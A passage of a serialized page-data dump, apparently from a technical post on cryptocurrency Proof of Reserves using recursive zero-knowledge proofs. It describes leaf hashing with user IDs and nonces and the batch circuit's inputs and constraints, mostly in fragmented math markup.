circuit",{"type":26,"tag":35,"props":95482,"children":95483},{},[95484],{"type":32,"value":95485},"With those two circuits, we can generate the proofs recursive tree:",{"type":26,"tag":35,"props":95487,"children":95488},{},[95489],{"type":26,"tag":2210,"props":95490,"children":95492},{"alt":53181,"src":95491},"/posts/por/batch-circuit.png",[],{"type":26,"tag":5503,"props":95494,"children":95495},{},[95496],{"type":26,"tag":35,"props":95497,"children":95498},{},[95499,95501,95507,95509,95515],{"type":32,"value":95500},"Note: We are using 512 as ",{"type":26,"tag":130,"props":95502,"children":95504},{"className":95503},[],[95505],{"type":32,"value":95506},"BATCH_SIZE",{"type":32,"value":95508}," and 8 as ",{"type":26,"tag":130,"props":95510,"children":95512},{"className":95511},[],[95513],{"type":32,"value":95514},"RECURSIVE_SIZE",{"type":32,"value":95516}," which indicates how many children each circuit has. This is easily adjustable in the code, and the optimal configuration will depend on the amount of accounts being proved in the PoR.",{"type":26,"tag":5503,"props":95518,"children":95519},{},[95520],{"type":26,"tag":35,"props":95521,"children":95522},{},[95523],{"type":32,"value":95524},"Note 2: We add empty proofs as padding to chunks that don't have the correct length.",{"type":26,"tag":35,"props":95526,"children":95527},{},[95528],{"type":32,"value":95529},"Each non-leaf node in this tree is a ZK proof, which is generated using the related circuit; each circuit also generates the Merkle tree hash of each node, which is included in the Merkle tree.",{"type":26,"tag":118,"props":95531,"children":95533},{"id":95532},"leaf-nodes",[95534],{"type":32,"value":95535},"Leaf Nodes",{"type":26,"tag":35,"props":95537,"children":95538},{},[95539],{"type":32,"value":95540},"The leaf nodes are the hashes of the account information. It is calculated in this way:",{"type":26,"tag":35,"props":95542,"children":95543},{},[95544],{"type":26,"tag":130,"props":95545,"children":95547},{"className":95546},[133,134],[95548],{"type":26,"tag":137,"props":95549,"children":95551},{"className":95550},[140],[95552],{"type":26,"tag":137,"props":95553,"children":95555},{"className":95554,"ariaHidden":146},[145],[95556,95583],{"type":26,"tag":137,"props":95557,"children":95559},{"className":95558},[151],[95560,95565,95570,95574,95579],{"type":26,"tag":137,"props":95561,"children":95564},{"className":95562,"style":95563},[156],"height:0.6944em;",[],{"type":26,"tag":137,"props":95566,"children":95568},{"className":95567},[169,170],[95569],{"type":32,"value":86947},{"type":26,"tag":137,"props":95571,"children":95573},{"className":95572,"style":281},[184],[],{"type":26,"tag":137,"props":95575,"children":95577},{"className":95576},[286],[95578],{"type":32,"value":289},{"type":26,"tag":137,"props":95580,"children":95582},{"className":95581,"style":281},[184],[],{"type":26,"tag":137,"props":95584,"children":95586},{"className":95585},[151],[95587,95592,95597,95603,95608,95613,95618,95623,95628,95633,95639,95644,95649,95655,95660,95666,95672,95729,95734,95740,95745,95750,95755,95760,95765,95770,95775,95780,95785,95842,95847,95852,95857,95862,95867,95872,95877,95882,95888,95893,95899,95905,95910,95915,95920,95925,95930,95935,95940,95945,95950,95955,95960,95965,95970,95975],{"type":26,"tag":137,"props":95588,"children":95591},{"className":95589,"style":95590},[156],"height:1.06em;vertical-align:-0.31em;",[],{"type":26,"tag":137,"props":95593,"children":95595},{"className":95594,"style":1731},[169,170],[95596],{"type":32,"value":24181},{"type":26,"tag":137,"props":95598,"children":95600},{"className":95599},[169,170],[95601],{"type":32,"value":95602},"ose",{"type":26,"tag":137,"props":95604,"children":95606},{"className":95605},[169,170],[95607],{"type":32,"value":506},{"type":26,"tag":137,"props":95609,"children":95611},{"className":95610},[169,170],[95612],{"type":32,"value":3293},{"type":26,"tag":137,"props":95614,"children":95616},{"className":95615},[169,170],[95617],{"type":32,"value":705},{"type":26,"tag":137,"props":95619,"children":95621},{"className":95620},[169,170],[95622],{"type":32,"value":1549},{"type":26,"tag":137,"props":95624,"children":95626},{"className":95625},[162],[95627],{"type":32,"value":165},{"type":26,"tag":137,"props":95629,"children":95631},{"className":95630},[169,170],[95632],{"type":32,"value":41},{"type":26,"tag":137,"props":95634,"children":95636},{"className":95635},[169,170],[95637],{"type":32,"value":95638},"sse",{"type":26,"tag":137,"props":95640,"children":95642},{"className":95641},[169,170],[95643],{"type":32,"value":24313},{"type":26,"tag":137,"props":95645,"children":95647},{"className":95646,"style":621},[169],[95648],{"type":32,"value":5666},{"type":26,"tag":137,"props":95650,"children":95652},{"className":95651},[169,170],[95653],{"type":32,"value":95654},"ba",{"type":26,"tag":137,"props":95656,"children":95658},{"className":95657,"style":537},[169,170],[95659],{"type":32,"value":540},{"type":26,"tag":137,"props":95661,"children":95663},{"className":95662},[169,170],[95664],{"type":32,"value":95665},"an",{"type":26,"tag":137,"props":95667,"children":95669},{"className":95668},[169,170],[95670],{"type":32,"value":95671},"ce",{"type":26,"tag":137,"props":95673,"children":95675},{"className":95674},[169],[95676,95681],{"type":26,"tag":137,"props":95677,"children":95679},{"className":95678},[169,170],[95680],{"type":32,"value":13242},{"type":26,"tag":137,"props":95682,"children":95684},{"className":95683},[236],[95685],{"type":26,"tag":137,"props":95686,"children":95688},{"className":95687},[241,417],[95689,95718],{"type":26,"tag":137,"props":95690,"children":95692},{"className":95691},[246],[95693,95713],{"type":26,"tag":137,"props":95694,"children":95696},{"className":95695,"style":426},[251],[95697],{"type":26,"tag":137,"props":95698,"children":95699},{"style":430},[95700,95704],{"type":26,"tag":137,"props":95701,"children":95703},{"className":95702,"style":262},[261],[],{"type":26,"tag":137,"props":95705,"children":95707},{"className":95706},[267,268,269,270],[95708],{"type":26,"tag":137,"props":95709,"children":95711},{"className":95710},[169,270],[95712],{"type":32,"value":1817},{"type":26,"tag":137,"props":95714,"children":95716},{"className":95715},[453],[95717],{"type":32,"value":456},{"type":26,"tag":137,"props":95719,"children":95721},{"className":95720},[246],[95722],{"type":26,"tag":137,"props":95723,"children":95725},{"className":95724,"style":464},[251],[95726],{"type":26,"tag":137,"props":95727,"children":95728},{},[],{"type":26,"tag":137,"props":95730,"children":95732},{"className":95731},[184],[95733],{"type":32,"value":24273},{"type":26,"tag":137,"props":95735,"children":95737},{"className":95736},[169],[95738],{"type":32,"value":95739},"∣∣",{"type":26,"tag":137,"props":95741,"children":95743},{"className":95742},[184],[95744],{"type":32,"value":24273},{"type":26,"tag":137,"props":95746,"children":95748},{"className":95747},[169,170],[95749],{"type":32,"value":41},{"type":26,"tag":137,"props":95751,"children":95753},{"className":95752},[169,170],[95754],{"type":32,"value":95638},{"type":26,"tag":137,"props":95756,"children":95758},{"className":95757},[169,170],[95759],{"type":32,"value":24313},{"type":26,"tag":137,"props":95761,"children":95763},{"className":95762,"style":621},[169],[95764],{"type":32,"value":5666},{"type":26,"tag":137,"props":95766,"children":95768},{"className":95767},[169,170],[95769],{"type":32,"value":95654},{"type":26,"tag":137,"props":95771,"children":95773},{"className":95772,"style":537},[169,170],[95774],{"type":32,"value":540},{"type":26,"tag":137,"props":95776,"children":95778},{"className":95777},[169,170],[95779],{"type":32,"value":95665},{"type":26,"tag":137,"props":95781,"children":95783},{"className":95782},[169,170],[95784],{"type":32,"value":95671},{"type":26,"tag":137,"props":95786,"children":95788},{"className":95787},[169],[95789,95794],{"type":26,"tag":137,"props":95790,"children":95792},{"className":95791},[169,170],[95793],{"type":32,"value":13242},{"type":26,"tag":137,"props":95795,"children":95797},{"className":95796},[236],[95798],{"type":26,"tag":137,"props":95799,"children":95801},{"className":95800},[241,417],[95802,95831],{"type":26,"tag":137,"props":95803,"children":95805},{"className":95804},[246],[95806,95826],{"type":26,"tag":137,"props":95807,"children":95809},{"className":95808,"style":426},[251],[95810],{"type":26,"tag":137,"props":95811,"children":95812},{"style":430},[95813,95817],{"type":26,"tag":137,"props":95814,"children":95816},{"className":95815,"style":262},[261],[],{"type":26,"tag":137,"props":95818,"children":95820},{"className":95819},[267,268,269,270],[95821],{"type":26,"tag":137,"props":95822,"children":95824},{"className":95823},[169,270],[95825],{"type":32,"value":878},{"type":26,"tag":137,"props":95827,"children":95829},{"className":95828},[453],[95830],{"type":32,"value":456},{"type":26,"tag":137,"props":95832,"children":95834},{"className":95833},[246],[95835],{"type":26,"tag":137,"props":95836,"children":95838},{"className":95837,"style":464},[251],[95839],{"type":26,"tag":137,"props":95840,"children":95841},{},[],{"type":26,"tag":137,"props":95843,"children":95845},{"className":95844},[184],[95846],{"type":32,"value":24273},{"type":26,"tag":137,"props":95848,"children":95850},{"className":95849},[169],[95851],{"type":32,"value":12180},{"type":26,"tag":137,"props":95853,"children":95855},{"className":95854},[184],[95856],{"type":32,"value":24273},{"type":26,"tag":137,"props":95858,"children":95860},{"className":95859},[169],[95861],{"type":32,"value":95739},{"type":26,"tag":137,"props":95863,"children":95865},{"className":95864},[184],[95866],{"type":32,"value":24273},{"type":26,"tag":137,"props":95868,"children":95870},{"className":95869,"style":24627},[169,170],[95871],{"type":32,"value":24630},{"type":26,"tag":137,"props":95873,"children":95875},{"className":95874,"style":1517},[169,170],[95876],{"type":32,"value":1520},{"type":26,"tag":137,"props":95878,"children":95880},{"className":95879},[169,170],[95881],{"type":32,"value":79370},{"type":26,"tag":137,"props":95883,"children":95885},{"className":95884},[169],[95886],{"type":32,"value":95887},"256",{"type":26,"tag":137,"props":95889,"children":95891},{"className":95890},[162],[95892],{"type":32,"value":165},{"type":26,"tag":137,"props":95894,"children":95896},{"className":95895},[169,170],[95897],{"type":32,"value":95898},"u",{"type":26,"tag":137,"props":95900,"children":95902},{"className":95901,"style":621},[169,170],[95903],{"type":32,"value":95904},"ser",{"type":26,"tag":137,"props":95906,"children":95908},{"className":95907,"style":621},[169],[95909],{"type":32,"value":5666},{"type":26,"tag":137,"props":95911,"children":95913},{"className":95912},[169,170],[95914],{"type":32,"value":506},{"type":26,"tag":137,"props":95916,"children":95918},{"className":95917},[169,170],[95919],{"type":32,"value":3293},{"type":26,"tag":137,"props":95921,"children":95923},{"className":95922},[197],[95924],{"type":32,"value":200},{"type":26,"tag":137,"props":95926,"children":95928},{"className":95927},[184],[95929],{"type":32,"value":24273},{"type":26,"tag":137,"props":95931,"children":95933},{"className":95932},[169],[95934],{"type":32,"value":95739},{"type":26,"tag":137,"props":95936,"children":95938},{"className":95937},[184],[95939],{"type":32,"value":24273},{"type":26,"tag":137,"props":95941,"children":95943},{"className":95942},[169,170],[95944],{"type":32,"value":95898},{"type":26,"tag":137,"props":95946,"children":95948},{"className":95947,"style":621},[169,170],[95949],{"type":32,"value":95904},{"type":26,"tag":137,"props":95951,"children":95953},{"className":95952,"style":621},[169],[95954],{"type":32,"value":5666},{"type":26,"tag":137,"props":95956,"children":95958},{"className":95957},[169,170],[95959],{"type":32,"value":1549},{"type":26,"tag":137,"props":95961,"children":95963},{"className":95962},[169,170],[95964],{"type":32,"value":705},{"type":26,"tag":137,"props":95966,"children":95968},{"className":95967},[169,170],[95969],{"type":32,"value":1549},{"type":26,"tag":137,"props":95971,"children":95973},{"className":95972},[169,170],[95974],{"type":32,"value":95671},{"type":26,"tag":137,"props":95976,"children":95978},{"className":95977},[197],[95979],{"type":32,"value":200},{"type":26,"tag":35,"props":95981,"children":95982},{},[95983,95985,95991],{"type":32,"value":95984},"In other words, all balances are concatenated with the hashed user ID (which can be a ",{"type":26,"tag":130,"props":95986,"children":95988},{"className":95987},[],[95989],{"type":32,"value":95990},"uuid",{"type":32,"value":95992},", a username or an incremental ID) and with a nonce. The nonce is a random number that serves as a security measure against attackers who could brute-force the hash to find out other users' balances. Since the Merkle tree is a public proof, we need to be careful against these types of data leaks.",{"type":26,"tag":118,"props":95994,"children":95996},{"id":95995},"batch-circuit",[95997],{"type":32,"value":95998},"Batch Circuit",{"type":26,"tag":35,"props":96000,"children":96001},{},[96002],{"type":32,"value":96003},"The batch circuit is the first proven circuit in the PoR algorithm. It receives the account's information (grouped in 512) and generates the ZK proof with those constraints:",{"type":26,"tag":35,"props":96005,"children":96006},{},[96007],{"type":26,"tag":84,"props":96008,"children":96009},{},[96010],{"type":32,"value":96011},"Public Inputs",{"type":26,"tag":3426,"props":96013,"children":96014},{},[96015,96020,96025],{"type":26,"tag":3430,"props":96016,"children":96017},{},[96018],{"type":32,"value":96019},"Asset prices in USD",{"type":26,"tag":3430,"props":96021,"children":96022},{},[96023],{"type":32,"value":96024},"Merkle tree hash",{"type":26,"tag":3430,"props":96026,"children":96027},{},[96028],{"type":32,"value":96029},"Summed asset balances",{"type":26,"tag":35,"props":96031,"children":96032},{},[96033],{"type":26,"tag":84,"props":96034,"children":96035},{},[96036],{"type":32,"value":96037},"Private Inputs",{"type":26,"tag":3426,"props":96039,"children":96040},{},[96041,96046],{"type":26,"tag":3430,"props":96042,"children":96043},{},[96044],{"type":32,"value":96045},"Users balances",{"type":26,"tag":3430,"props":96047,"children":96048},{},[96049],{"type":32,"value":96050},"Merkle tree leaves hashes",{"type":26,"tag":35,"props":96052,"children":96053},{},[96054],{"type":26,"tag":84,"props":96055,"children":96056},{},[96057],{"type":32,"value":96058},"Constraints",{"type":26,"tag":3426,"props":96060,"children":96061},{},[96062,96510,96677,97024,97422],{"type":26,"tag":3430,"props":96063,"children":96064},{},[96065],{"type":26,"tag":130,"props":96066,"children":96068},{"className":96067},[133,134],[96069],{"type":26,"tag":137,"props":96070,"children":96072},{"className":96071},[140],[96073],{"type":26,"tag":137,"props":96074,"children":96076},{"className":96075,"ariaHidden":146},[145],[96077,96212,96416],{"type":26,"tag":137,"props":96078,"children":96080},{"className":96079},[151],[96081,96086,96091,96097,96102,96107,96112,96117,96122,96127,96132,96137,96142,96199,96203,96208],{"type":26,"tag":137,"props":96082,"children":96085},{"className":96083,"style":96084},[156],"height:0.9695em;vertical-align:-0.31em;",[],{"type":26,"tag":137,"props":96087,"children":96089},{"className":96088},[169,170],[96090],{"type":32,"value":41},{"type":26,"tag":137,"props":96092,"children":96094},{"className":96093},[169,170],[96095],{"type":32,"value":96096},"cco",{"type":26,"tag":137,"props":96098,"children":96100},{"className":96099},[169,170],[96101],{"type":32,"value":95898},{"type":26,"tag":137,"props":96103,"children":96105},{"className":96104},[169,170],[96106],{"type":32,"value":1549},{"type":26,"tag":137,"props":96108,"children":96110},{"className":96109},[169,170],[96111],{"type":32,"value":24313},{"type":26,"tag":137,"props":96113,"children":96115},{"className":96114,"style":621},[169],[96116],{"type":32,"value":5666},{"type":26,"tag":137,"props":96118,"children":96120},{"className":96119},[169,170],[96121],{"type":32,"value":54057},{"type":26,"tag":137,"props":96123,"children":96125},{"className":96124,"style":190},[169,170],[96126],{"type":32,"value":799},{"type":26,"tag":137,"props":96128,"children":96130},{"className":96129},[169,170],[96131],{"type":32,"value":95898},{"type":26,"tag":137,"props":96133,"children":96135},{"className":96134},[169,170],[96136],{"type":32,"value":506},{"type":26,"tag":137,"props":96138,"children":96140},{"className":96139},[169,170],[96141],{"type":32,"value":24313},{"type":26,"tag":137,"props":96143,"children":96145},{"className":96144},[169],[96146,96151],{"type":26,"tag":137,"props":96147,"children":96149},{"className":96148,"style":190},[169,170],[96150],{"type":32,"value":193},{"type":26,"tag":137,"props":96152,"children":96154},{"className":96153},[236],[96155],{"type":26,"tag":137,"props":96156,"children":96158},{"className":96157},[241,417],[96159,96188],{"type":26,"tag":137,"props":96160,"children":96162},{"className":96161},[246],[96163,96183],{"type":26,"tag":137,"props":96164,"children":96166},{"className":96165,"style":556},[251],[96167],{"type":26,"tag":137,"props":96168,"children":96169},{"style":819},[96170,96174],{"type":26,"tag":137,"props":96171,"children":96173},{"className":96172,"style":262},[261],[],{"type":26,"tag":137,"props":96175,"children":96177},{"className":96176},[267,268,269,270],[96178],{"type":26,"tag":137,"props":96179,"children":96181},{"className":96180},[169,170,270],[96182],{"type":32,"value":506},{"type":26,"tag":137,"props":96184,"children":96186},{"className":96185},[453],[96187],{"type":32,"value":456},{"type":26,"tag":137,"props":96189,"children":96191},{"className":96190},[246],[96192],{"type":26,"tag":137,"props":96193,"children":96195},{"className":96194,"style":464},[251],[96196],{"type":26,"tag":137,"props":96197,"children":96198},{},[],{"type":26,"tag":137,"props":96200,"children":96202},{"className":96201,"style":281},[184],[],{"type":26,"tag":137,"props":96204,"children":96206},{"className":96205},[286],[96207],{"type":32,"value":11161},{"type":26,"tag":137,"props":96209,"children":96211},{"className":96210,"style":281},[184],[],{"type":26,"tag":137,"props":96213,"children":96215},{"className":96214},[151],[96216,96220,96226,96231,96236,96241,96246,96251,96256,96261,96266,96271,96276,96281,96286,96291,96296,96301,96358,96363,96368,96373,96378,96383,96388,96393,96398,96403,96407,96412],{"type":26,"tag":137,"props":96217,"children":96219},{"className":96218,"style":95590},[156],[],{"type":26,"tag":137,"props":96221,"children":96223},{"className":96222},[169],[96224],{"type":32,"value":96225},"Σ",{"type":26,"tag":137,"props":96227,"children":96229},{"className":96228},[184],[96230],{"type":32,"value":24273},{"type":26,"tag":137,"props":96232,"children":96234},{"className":96233},[169,170],[96235],{"type":32,"value":41},{"type":26,"tag":137,"props":96237,"children":96239},{"className":96238},[169,170],[96240],{"type":32,"value":96096},{"type":26,"tag":137,"props":96242,"children":96244},{"className":96243},[169,170],[96245],{"type":32,"value":95898},{"type":26,"tag":137,"props":96247,"children":96249},{"className":96248},[169,170],[96250],{"type":32,"value":1549},{"type":26,"tag":137,"props":96252,"children":96254},{"className":96253},[169,170],[96255],{"type":32,"value":24313},{"type":26,"tag":137,"props":96257,"children":96259},{"className":96258,"style":621},[169],[96260],{"type":32,"value":5666},{"type":26,"tag":137,"props":96262,"children":96264},{"className":96263},[169,170],[96265],{"type":32,"value":41},{"type":26,"tag":137,"props":96267,"children":96269},{"className":96268},[169,170],[96270],{"type":32,"value":95638},{"type":26,"tag":137,"props":96272,"children":96274},{"className":96273},[169,170],[96275],{"type":32,"value":24313},{"type":26,"tag":137,"props":96277,"children":96279},{"className":96278,"style":621},[169],[96280],{"type":32,"value":5666},{"type":26,"tag":137,"props":96282,"children":96284},{"className":96283},[169,170],[96285],{"type":32,"value":95654},{"type":26,"tag":137,"props":96287,"children":96289},{"className":96288,"style":537},[169,170],[96290],{"type":32,"value":540},{"type":26,"tag":137,"props":96292,"children":96294},{"className":96293},[169,170],[96295],{"type":32,"value":95665},{"type":26,"tag":137,"props":96297,"children":96299},{"className":96298},[169,170],[96300],{"type":32,"value":95671},{"type":26,"tag":137,"props":96302,"children":96304},{"className":96303},[169],[96305,96310],{"type":26,"tag":137,"props":96306,"children":96308},{"className":96307},[169,170],[96309],{"type":32,"value":13242},{"type":26,"tag":137,"props":96311,"children":96313},{"className":96312},[236],[96314],{"type":26,"tag":137,"props":96315,"children":96317},{"className":96316},[241,417],[96318,96347],{"type":26,"tag":137,"props":96319,"children":96321},{"className":96320},[246],[96322,96342],{"type":26,"tag":137,"props":96323,"children":96325},{"className":96324,"style":556},[251],[96326],{"type":26,"tag":137,"props":96327,"children":96328},{"style":430},[96329,96333],{"type":26,"tag":137,"props":96330,"children":96332},{"className":96331,"style":262},[261],[],{"type":26,"tag":137,"props":96334,"children":96336},{"className":96335},[267,268,269,270],[96337],{"type":26,"tag":137,"props":96338,"children":96340},{"className":96339},[169,170,270],[96341],{"type":32,"value":506},{"type":26,"tag":137,"props":96343,"children":96345},{"className":96344},[453],[96346],{"type":32,"value":456},{"type":26,"tag":137,"props":96348,"children":96350},{"className":96349},[246],[96351],{"type":26,"tag":137,"props":96352,"children":96354},{"className":96353,"style":464},[251],[96355],{"type":26,"tag":137,"props":96356,"children":96357},{},[],{"type":26,"tag":137,"props":96359,"children":96361},{"className":96360},[162],[96362],{"type":32,"value":3016},{"type":26,"tag":137,"props":96364,"children":96366},{"className":96365},[169,170],[96367],{"type":32,"value":41},{"type":26,"tag":137,"props":96369,"children":96371},{"className":96370},[169,170],[96372],{"type":32,"value":95638},{"type":26,"tag":137,"props":96374,"children":96376},{"className":96375},[169,170],[96377],{"type":32,"value":24313},{"type":26,"tag":137,"props":96379,"children":96381},{"className":96380,"style":621},[169],[96382],{"type":32,"value":5666},{"type":26,"tag":137,"props":96384,"children":96386},{"className":96385},[169,170],[96387],{"type":32,"value":1549},{"type":26,"tag":137,"props":96389,"children":96391},{"className":96390},[169,170],[96392],{"type":32,"value":95898},{"type":26,"tag":137,"props":96394,"children":96396},{"className":96395},[169,170],[96397],{"type":32,"value":53736},{"type":26,"tag":137,"props":96399,"children":96401},{"className":96400},[197],[96402],{"type":32,"value":3079},{"type":26,"tag":137,"props":96404,"children":96406},{"className":96405,"style":348},[184],[],{"type":26,"tag":137,"props":96408,"children":96410},{"className":96409},[353],[96411],{"type":32,"value":6683},{"type":26,"tag":137,"props":96413,"children":96415},{"className":96414,"style":348},[184],[],{"type":26,"tag":137,"props":96417,"children":96419},{"className":96418},[151],[96420,96424,96429,96434,96439,96444,96449,96454,96459,96465,96470,96475,96480,96485,96490,96495,96500,96505],{"type":26,"tag":137,"props":96421,"children":96423},{"className":96422,"style":95590},[156],[],{"type":26,"tag":137,"props":96425,"children":96427},{"className":96426},[169,170],[96428],{"type":32,"value":41},{"type":26,"tag":137,"props":96430,"children":96432},{"className":96431},[169,170],[96433],{"type":32,"value":95638},{"type":26,"tag":137,"props":96435,"children":96437},{"className":96436},[169,170],[96438],{"type":32,"value":24313},{"type":26,"tag":137,"props":96440,"children":96442},{"className":96441,"style":621},[169],[96443],{"type":32,"value":5666},{"type":26,"tag":137,"props":96445,"children":96447},{"className":96446},[169,170],[96448],{"type":32,"value":35},{"type":26,"tag":137,"props":96450,"children":96452},{"className":96451,"style":621},[169,170],[96453],{"type":32,"value":624},{"type":26,"tag":137,"props":96455,"children":96457},{"className":96456},[169,170],[96458],{"type":32,"value":506},{"type":26,"tag":137,"props":96460,"children":96462},{"className":96461},[169,170],[96463],{"type":32,"value":96464},"ces",{"type":26,"tag":137,"props":96466,"children":96468},{"className":96467},[162],[96469],{"type":32,"value":3016},{"type":26,"tag":137,"props":96471,"children":96473},{"className":96472},[169,170],[96474],{"type":32,"value":41},{"type":26,"tag":137,"props":96476,"children":96478},{"className":96477},[169,170],[96479],{"type":32,"value":95638},{"type":26,"tag":137,"props":96481,"children":96483},{"className":96482},[169,170],[96484],{"type":32,"value":24313},{"type":26,"tag":137,"props":96486,"children":96488},{"className":96487,"style":621},[169],[96489],{"type":32,"value":5666},{"type":26,"tag":137,"props":96491,"children":96493},{"className":96492},[169,170],[96494],{"type":32,"value":1549},{"type":26,"tag":137,"props":96496,"children":96498},{"className":96497},[169,170],[96499],{"type":32,"value":95898},{"type":26,"tag":137,"props":96501,"children":96503},{"className":96502},[169,170],[96504],{"type":32,"value":53736},{"type":26,"tag":137,"props":96506,"children":96508},{"className":96507},[197],[96509],{"type":32,"value":3079},{"type":26,"tag":3430,"props":96511,"children":96512},{},[96513,96671,96672],{"type":26,"tag":130,"props":96514,"children":96516},{"className":96515},[133,134],[96517],{"type":26,"tag":137,"props":96518,"children":96520},{"className":96519},[140],[96521],{"type":26,"tag":137,"props":96522,"children":96524},{"className":96523,"ariaHidden":146},[145],[96525,96658],{"type":26,"tag":137,"props":96526,"children":96528},{"className":96527},[151],[96529,96533,96538,96543,96548,96553,96558,96563,96568,96573,96578,96583,96588,96645,96649,96654],{"type":26,"tag":137,"props":96530,"children":96532},{"className":96531,"style":96084},[156],[],{"type":26,"tag":137,"props":96534,"children":96536},{"className":96535},[169,170],[96537],{"type":32,"value":41},{"type":26,"tag":137,"props":96539,"children":96541},{"className":96540},[169,170],[96542],{"type":32,"value":96096},{"type":26,"tag":137,"props":96544,"children":96546},{"className":96545},[169,170],[96547],{"type":32,"value":95898},{"type":26,"tag":137,"props":96549,"children":96551},{"className":96550},[169,170],[96552],{"type":32,"value":1549},{"type":26,"tag":137,"props":96554,"children":96556},{"className":96555},[169,170],[96557],{"type":32,"value":24313},{"type":26,"tag":137,"props":96559,"children":96561},{"className":96560,"style":621},[169],[96562],{"type":32,"value":5666},{"type":26,"tag":137,"props":96564,"children":96566},{"className":96565},[169,170],[96567],{"type":32,"value":54057},{"type":26,"tag":137,"props":96569,"children":96571},{"className":96570,"style":190},[169,170],[96572],{"type":32,"value":799},{"type":26,"tag":137,"props":96574,"children":96576},{"className":96575},[169,170],[96577],{"type":32,"value":95898},{"type":26,"tag":137,"props":96579,"children":96581},{"className":96580},[169,170],[96582],{"type":32,"value":506},{"type":26,"tag":137,"props":96584,"children":96586},{"className":96585},[169,170],[96587],{"type":32,"value":24313},{"type":26,"tag":137,"props":96589,"children":96591},{"className":96590},[169],[96592,96597],{"type":26,"tag":137,"props":96593,"children":96595},{"className":96594,"style":190},[169,170],[96596],{"type":32,"value":193},{"type":26,"tag":137,"props":96598,"children":96600},{"className":96599},[236],[96601],{"type":26,"tag":137,"props":96602,"children":96604},{"className":96603},[241,417],[96605,96634],{"type":26,"tag":137,"props":96606,"children":96608},{"className":96607},[246],[96609,96629],{"type":26,"tag":137,"props":96610,"children":96612},{"className":96611,"style":556},[251],[96613],{"type":26,"tag":137,"props":96614,"children":96615},{"style":819},[96616,96620],{"type":26,"tag":137,"props":96617,"children":96619},{"className":96618,"style":262},[261],[],{"type":26,"tag":137,"props":96621,"children":96623},{"className":96622},[267,268,269,270],[96624],{"type":26,"tag":137,"props":96625,"children":96627},{"className":96626},[169,170,270],[96628],{"type":32,"value":506},{"type":26,"tag":137,"props":96630,"children":96632},{"className":96631},[453],[96633],{"type":32,"value":456},{"type":26,"tag":137,"props":96635,"children":96637},{"className":96636},[246],[96638],{"type":26,"tag":137,"props":96639,"children":96641},{"className":96640,"style":464},[251],[96642],{"type":26,"tag":137,"props":96643,"children":96644},{},[],{"type":26,"tag":137,"props":96646,"children":96648},{"className":96647,"style":281},[184],[],{"type":26,"tag":137,"props":96650,"children":96652},{"className":96651},[286],[96653],{"type":32,"value":12533},{"type":26,"tag":137,"props":96655,"children":96657},{"className":96656,"style":281},[184],[],{"type":26,"tag":137,"props":96659,"children":96661},{"className":96660},[151],[96662,96666],{"type":26,"tag":137,"props":96663,"children":96665},{"className":96664,"style":368},[156],[],{"type":26,"tag":137,"props":96667,"children":96669},{"className":96668},[169],[96670],{"type":32,"value":1817},{"type":32,"value":1011},{"type":26,"tag":84,"props":96673,"children":96674},{},[96675],{"type":32,"value":96676},"(non-negativity)",{"type":26,"tag":3430,"props":96678,"children":96679},{},[96680,97018,97019],{"type":26,"tag":130,"props":96681,"children":96683},{"className":96682},[133,134],[96684],{"type":26,"tag":137,"props":96685,"children":96687},{"className":96686},[140],[96688],{"type":26,"tag":137,"props":96689,"children":96691},{"className":96690,"ariaHidden":146},[145],[96692,96828],{"type":26,"tag":137,"props":96693,"children":96695},{"className":96694},[151],[96696,96700,96705,96710,96715,96720,96725,96730,96735,96740,96745,96750,96755,96760,96765,96770,96775,96780,96785,96790,96795,96800,96805,96810,96815,96819,96824],{"type":26,"tag":137,"props":96697,"children":96699},{"className":96698,"style":95590},[156],[],{"type":26,"tag":137,"props":96701,"children":96703},{"className":96702},[169,170],[96704],{"type":32,"value":24313},{"type":26,"tag":137,"props":96706,"children":96708},{"className":96707},[169,170],[96709],{"type":32,"value":705},{"type":26,"tag":137,"props":96711,"children":96713},{"className":96712},[169,170],[96714],{"type":32,"value":24313},{"type":26,"tag":137,"props":96716,"children":96718},{"className":96717},[169,170],[96719],{"type":32,"value":41},{"type":26,"tag":137,"props":96721,"children":96723},{"className":96722,"style":537},[169,170],[96724],{"type":32,"value":540},{"type":26,"tag":137,"props":96726,"children":96728},{"className":96727,"style":621},[169],[96729],{"type":32,"value":5666},{"type":26,"tag":137,"props":96731,"children":96733},{"className":96732},[169,170],[96734],{"type":32,"value":41},{"type":26,"tag":137,"props":96736,"children":96738},{"className":96737},[169,170],[96739],{"type":32,"value":95638},{"type":26,"tag":137,"props":96741,"children":96743},{"className":96742},[169,170],[96744],{"type":32,"value":24313},{"type":26,"tag":137,"props":96746,"children":96748},{"className":96747,"style":621},[169],[96749],{"type":32,"value":5666},{"type":26,"tag":137,"props":96751,"children":96753},{"className":96752},[169,170],[96754],{"type":32,"value":95654},{"type":26,"tag":137,"props":96756,"children":96758},{"className":96757,"style":537},[169,170],[96759],{"type":32,"value":540},{"type":26,"tag":137,"props":96761,"children":96763},{"className":96762},[169,170],[96764],{"type":32,"value":95665},{"type":26,"tag":137,"props":96766,"children":96768},{"className":96767},[169,170],[96769],{"type":32,"value":95671},{"type":26,"tag":137,"props":96771,"children":96773},{"className":96772},[162],[96774],{"type":32,"value":3016},{"type":26,"tag":137,"props":96776,"children":96778},{"className":96777},[169,170],[96779],{"type":32,"value":41},{"type":26,"tag":137,"props":96781,"children":96783},{"className":96782},[169,170],[96784],{"type":32,"value":95638},{"type":26,"tag":137,"props":96786,"children":96788},{"className":96787},[169,170],[96789],{"type":32,"value":24313},{"type":26,"tag":137,"props":96791,"children":96793},{"className":96792,"style":621},[169],[96794],{"type":32,"value":5666},{"type":26,"tag":137,"props":96796,"children":96798},{"className":96797},[169,170],[96799],{"type":32,"value":1549},{"type":26,"tag":137,"props":96801,"children":96803},{"className":96802},[169,170],[96804],{"type":32,"value":95898},{"type":26,"tag":137,"props":96806,"children":96808},{"className":96807},[169,170],[96809],{"type":32,"value":53736},{"type":26,"tag":137,"props":96811,"children":96813},{"className":96812},[197],[96814],{"type":32,"value":3079},{"type":26,"tag":137,"props":96816,"children":96818},{"className":96817,"style":281},[184],[],{"type":26,"tag":137,"props":96820,"children":96822},{"className":96821},[286],[96823],{"type":32,"value":11161},{"type":26,"tag":137,"props":96825,"children":96827},{"className":96826,"style":281},[184],[],{"type":26,"tag":137,"props":96829,"children":96831},{"className":96830},[151],[96832,96836,96841,96846,96851,96856,96861,96866,96871,96876,96881,96886,96891,96896,96901,96906,96911,96916,96973,96978,96983,96988,96993,96998,97003,97008,97013],{"type":26,"tag":137,"props":96833,"children":96835},{"className":96834,"style":95590},[156],[],{"type":26,"tag":137,"props":96837,"children":96839},{"className":96838},[169],[96840],{"type":32,"value":96225},{"